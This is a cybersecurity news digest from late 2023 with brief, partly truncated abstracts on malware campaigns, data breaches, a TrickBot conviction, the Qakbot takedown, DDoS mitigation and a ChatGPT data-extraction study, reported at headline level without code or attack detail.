While the Turtle ransomware may not pose a significant risk to macOS users currently, its existence highlights the ongoing efforts by ransomware authors to target Apple devices.

Cyware

December 02, 2023 – Policy and Law

Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware Full Text

Abstract

A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced. Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later. "Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data mining from infected computers, facilitated and enhanced the remote access used by TrickBot actors, and created a program code to prevent the TrickBot malware from being detected by legitimate security software," the DoJ said . "During Dunaev's participation in the scheme, 10 victims in the Northern District of Ohio, including Avon schools and a North Canton real-estate company, were defrauded of more than $3.4 million via ransomware deployed by TrickBot." Dunaev, who pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and ban

The Hacker News

December 2, 2023 – Breach

Surgical Practice Notifying 437,400 Patients of Data Theft Full Text

Abstract

Proliance Surgeons, a large Seattle-based surgical group, suffered a ransomware attack and data theft, potentially compromising the personal information of nearly 437,400 individuals.

Cyware

December 2, 2023 – Breach

Update: 23andMe Says Hackers Accessed ‘Significant Number’ of Files About Users’ Ancestry Full Text

Abstract

Genetic testing company 23andMe experienced a data breach, with hackers accessing around 14,000 customer accounts and potentially compromising the personal information of other users connected to those accounts.

Cyware

December 01, 2023 – Malware

New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia Full Text

Abstract

Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023. "Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday. Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components. Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery ( TOAD ), which involves calling a bogus call center to receive step-by-step instructions for running the app. A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of

The Hacker News

December 01, 2023 – Education

Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats Full Text

Abstract

The U.S. Department of Justice (DOJ) and the FBI recently collaborated in a multinational operation to dismantle the notorious Qakbot malware and botnet. While the operation was successful in disrupting this long-running threat, concerns have arisen as it appears that Qakbot may still pose a danger in a reduced form. This article discusses the aftermath of the takedown, provides mitigation strategies, and offers guidance on determining past infections. The Takedown and Its Limitations During the takedown operation, law enforcement secured court orders to remove Qakbot malware from infected devices remotely. It was discovered that the malware had infected a substantial number of devices, with 700,000 machines globally, including 200,000 computers in the U.S., being compromised at the time of the takedown. However, recent reports suggest that Qakbot is still active but in a diminished state. The absence of arrests during the takedown operation indicates that only the command-and-cont

The Hacker News

December 1, 2023 – Attack

XDSpy Hackers Attack Military-Industrial Companies in Russia Full Text

Abstract

XDSpy has a history of targeting Russia's government, military, financial institutions, as well as energy, research, and mining companies, demonstrating a focus on strategic organizations in Eastern Europe.

Cyware

December 01, 2023 – Attack

Chinese Hackers Using SugarGh0st RAT to Target South Korea and Uzbekistan Full Text

Abstract

A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called SugarGh0st RAT . The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT (aka Farfli). It comes with features to "facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code," Cisco Talos researchers Ashley Shen and Chetan Raghuprasad said . The attacks commence with a phishing email bearing decoy documents, opening which activates a multi-stage process that leads to the deployment of SugarGh0st RAT. The decoy documents are incorporated within a heavily obfuscated JavaScript dropper that's contained within a Windows Shortcut file embed

The Hacker News

December 1, 2023 – Vulnerabilities

Simple Hacking Technique can Extract ChatGPT Training Data Full Text

Abstract

Researchers from Google DeepMind, Cornell University, and other institutions have discovered that the popular AI chatbot ChatGPT is susceptible to leaking data when prompted to repeat certain words.

Cyware

December 01, 2023 – Denial Of Service

Discover How Gcore Thwarted Powerful 1.1Tbps and 1.6Tbps DDoS Attacks Full Text

Abstract

The most recent Gcore Radar report and its aftermath have highlighted a dramatic increase in DDoS attacks across multiple industries. At the beginning of 2023, the average strength of attacks reached 800 Gbps , but now, even a peak as high as 1.5+ Tbps is unsurprising. To try and break through Gcore's defenses, perpetrators made two attempts with two different strategies. Read on to discover what happened and learn how the security provider stopped the attackers in their tracks without affecting end users' experiences. A Powerful DDoS Attacks In November 2023, one of Gcore's customers from the gaming industry was targeted by two massive DDoS attacks, peaking at 1.1 and 1.6 Tbps respectively. The attackers deployed various techniques in an unsuccessful attempt to compromise Gcore's protective mechanisms. Attack #1: 1.1 Tbps UDP-based DDoS In the first cyber assault, the attackers sent a barrage of UDP traffic to a target server, peaking at 1.1 Tbps. Two methods were employed:

The Hacker News

December 1, 2023 – Business
BlueVoyant Raises $140M, Buys Resilience Firm Conquest Cyber Full Text </p>

Abstract

The integration of BlueVoyant and Conquest Cyber will provide customers with more self-service capabilities and autonomous operations through the use of AI, machine learning, and virtual data lakes.

Cyware

December 1, 2023 – Attack

Hackers Use new Tool Set in Targeted Attacks Against Middle East, Africa and the US Full Text

Abstract

A new set of tools, including a backdoor, a credential-stealing module, and a customized version of Mimikatz, has been used in targeted attacks against organizations in the Middle East, Africa, and the U.S.

Cyware

January, 2024

Table of contents